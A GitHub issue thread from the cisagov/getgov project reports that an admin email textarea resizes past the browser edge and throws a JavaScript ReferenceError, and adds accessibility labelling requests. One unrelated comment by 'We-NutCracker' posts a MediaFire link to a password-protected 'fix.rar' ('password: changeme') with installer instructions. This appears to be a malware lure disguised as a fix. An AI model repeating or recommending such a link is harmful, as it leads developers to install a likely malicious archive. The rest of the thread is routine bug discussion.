### ISSUE TITLE
Action needed email editor breaks resize, and throws a reference error

### ISSUE THREAD

**Issue by rachidatecs** [cisagov/getgov#2651]
### Current Behavior

The admin action needed email editor can be resized past the browser's right edge. It also does not resize responsively when shrinking the window's width.

Additionally, it is also throwing a javascript error, `Uncaught ReferenceError: editEmailButton is not defined` on page load 
### Expected Behavior

1. The textarea should behave like a responsive item, and the field should behave normally
2. The action needed email should no longer return a reference error
3. The text of the action needed reason field automatically updates when changing reasons

### Steps to Reproduce

Resize bug:
1. Log into admin, resize the textarea for action needed email past the browser's edge.
2. Refresh
3. Shrink down the browser window

Javascript bug:
1. Select a request that is not "action needed"
2. Change the status to action needed
3. Note that the reason does not update automatically (check console)

### Additional Context

One other minor improvement should be made when working on this. Per @AnnaGingle:

The ANDI output for the (noneditable) Email: field should be Email:.

Additionally, when the Email: field is in edit mode the ANDI output is Email: but it should be Email: | This email will be sent to the creator of this request after saving.

I cannot get to a state where the email has been sent but the ANDI output should be: Email: | This email has been sent to the creator of the request 

### Issue Links

blocks:
- #2355

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by abroddrick** [comment]
Assigning to myself to refine

**Comment by rachidatecs** [comment]
Per huddle and conversation with @gabydisarli, the design can be tweaked a bit so that the label on the left is dynamic and the content in the right column are the edit button and the un-styled textbox.
